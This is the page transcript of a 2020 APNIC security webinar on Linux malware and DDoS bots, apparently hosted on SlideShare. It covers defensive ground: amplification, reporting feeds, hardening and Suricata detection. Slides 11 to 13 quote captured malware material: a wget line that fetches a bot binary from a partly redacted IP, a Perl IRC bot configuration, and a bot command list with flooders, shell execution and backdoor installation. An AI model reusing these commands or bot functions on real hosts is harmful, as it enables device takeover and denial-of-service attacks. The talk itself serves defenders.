Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and DDoS Agent

235 Aufrufe

Veröffentlicht am

APNIC's Senior Security Specialist Adli Wahid gave a presentation on Linux malware, DDoS agents and bots, based on observations from the Honeynet project at the IX 2020 – Internet Security and Mitigation of Risk Webinar, held online on 15 June 2020.

Veröffentlicht in: Internet
  • Als Erste(r) kommentieren

  • Gehören Sie zu den Ersten, denen das gefällt!

IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and DDoS Agent

  1. 1. 1 Linux Malware and DDoS Agent Adli Wahid Senior Internet Security Specialist APNIC 1
  2. 2. 2 Let’s Connect! • Email: adli@apnic.net • LinkedIn – Adli Wahid • Twitter - @adliwahid 2 https://unsplash.com/photos/8ZxiJ03e5S4
  3. 3. 3 Plan & Objectives 1. Share a different perspective on DDoS 2. Talk about DDoS Agents / Linux Malware 3. Observation from our Community Honeynet Project 3
  4. 4. 4 Different Perspective of DDoS 4 My Network / Infrastructure / Host Source Target / Victim Perspective Attacker Perspective
  5. 5. 5 Victim / Target Perspective • Availability affected o System down o Critical or not (what is affected?) • Priority o Business as usual o Services not distributed • Increase preparedness (or do nothing) – Detection – Incident Response – Mitigation • Investigation – Actor – Motive – Attacker infrastructure Source: https://www.shadowserver.org/news/mi rai-botnet-14-1-million-german- customers-disrupted-liberia-taken-off- line-and-now-the-culprit-has-been- convicted/
  6. 6. 6 Source of Attack Perspective • How is attack organized ? o We tend to see pieces of the puzzle (netflow, front-end) • How do attackers build their attacking infrastructure? – What tools are used ? • Can we identify the attacker’s infrastructure ? • Are we part of the attacker’s infrastructure? – Can we detect or prevent this? • Are we contributing to the DDOS problem? 6
  7. 7. 7 Tool & Techniques • Techniques – Misconfigured services used for amplification attacks o DNS, SSDP, NTP, Chargen etc – Recruiting servers & IoT devices as bots • Exploit known system vulnerabilities • Exploit weak/default credentials (i.e. ssh / telnet) + misconfiguration • Use of Malware – We hear more about Windows – Targeting Linux servers and IoT devices to infect device – ELF binaries or scripts (perl, bash, php etc) – Device will receive instructions to attack 7
  8. 8. 8 Vulnerable services Mongolia • Data from Cyber Green Project https://stats.cybergreen.net/country/mongolia/ • Challenge – how to deal with misconfiguration of these services? 8 DDOS Potential Open SNMP Open DNS Open NTP
  9. 9. 9 Get reports about your network • Shadowserver Foundation o https://www.shadowserver.org/what-we-do/network-reporting/get- reports/ • CyberGreen – Download data : https://stats.cybergreen.net/download/ • Do it yourself – Scan (Nmap) – Use service such as Shodan.io 9
  10. 10. 10 Linux/Unix Malware • Routers / IoT devices / Servers run Linux / Unix based OS • Not new but interesting – Targets are exposed on the Internet (http, telnet, 23) – Unpatched / Unmonitored (i.e. no Anti Virus) – Default/Weak credentials • Popular example – Mirai (ddos agent) – Source code was shared publicly • Simple technique of infecting and spreading & persistence 10
  11. 11. 11 source Brute force: Username: admin password:12345 Remote Code Execution via Web interface Download Binary / Execute Scan and gain access Connect to Command and Control C & C Bot “recruitment” process 11 wget http://37.x.2x.190:80/13747243572475/hx86_64 2 1 Attacker
  12. 12. 12 my $process = $rps[rand scalar @rps]; my @rversion = ("Phl4nk"); my $vers = $rversion[rand scalar @rversion]; my @rircname = ("zombie"); my $ircname = $rircname[rand scalar @rircname]; chop (my $realname = $rircname[rand scalar @rircn my $nick =$rircname[rand scalar @rircname]; my $server = '125.x.y.z'; my $port = '1947'; my $linas_max='8'; my $sleep='5'; my $homedir = "/tmp"; my $version = 'v.02'; my @admins = ("Nite","NiteMax","Nite123"); #my @hostauth = ("Nite"); my @channels = ("#VPS"); Perl Bot
  13. 13. 13 * Non-spoof / non-root attacks: (can run on all bots) * * STD <ip> <port> <time> = A non spoof UDP HIV STD flooder * * HOLD <host> <port> <time> = A vanilla TCP connection flooder * * JUNK <host> <port> <time> = A vanilla TCP flooder (modded) * * UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder * HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder * * * Spoof / root attacks: * * DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets. * * * Bot commands: * * AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. * * GETIP <iface> = gets the IP address from an interface * * FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port) * RNDNICK = Randomizes knight nickname * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from the knight * * ENABLE = Enables all packeting from the knight * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * * BASH <command> = Run a bash command * * ISH <command> = Interactive SH (via privmsg) * * SHD <command> = Daemonize command * * INSTALL <http://server/bin> = Install binary (via wget) * * BINUPDATE <http://server/bin> = Update a binary (via wget) * * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! * * * * Source code
  14. 14. 14 Preventing Infection • Know your assets & customers – Get reports from Shadowserver, CyberGreen – Use tools (nmap) or services like Shodan.io – Awareness of Vulnerabilities & Active exploitation • Secure / Harden Linux & IOT Devices o Access Control to services (brute force) o Remove / Harden services – DNS resolver, NTP, etc o Patch & Upgrade 14 https://otx.alienvault.net www.virustotal.com
  15. 15. 15 Detection • Network based detection – Policy – downloading of ELF / Binary with certain user agents – Brute force / telnet related activities • Network Security Monitoring – Netflow – IDS/NSM – Zeek, Suricata – Honeypots • Awareness of threat landscape – Go deep into malware research & analysis – Collaborate & share information – c&c, infected host • Forensics* 15 Detection with Suricata Rulesets Fbot - Community Honeynet Project (2019) https://securityaffairs.co/wordpress/96683/malware/linux-fbot-malware-analysis.html
  16. 16. 16 More information • APNIC blog https://blog.apnic.net • APNIC Academy https://academy.apnic.net 16
  17. 17. 17 Thank You! o Email: adli@apnic.net o LinkedIn – Adli Wahid o Twitter - @adliwahid https://unsplash.com/photos/foJms49Rrwc

×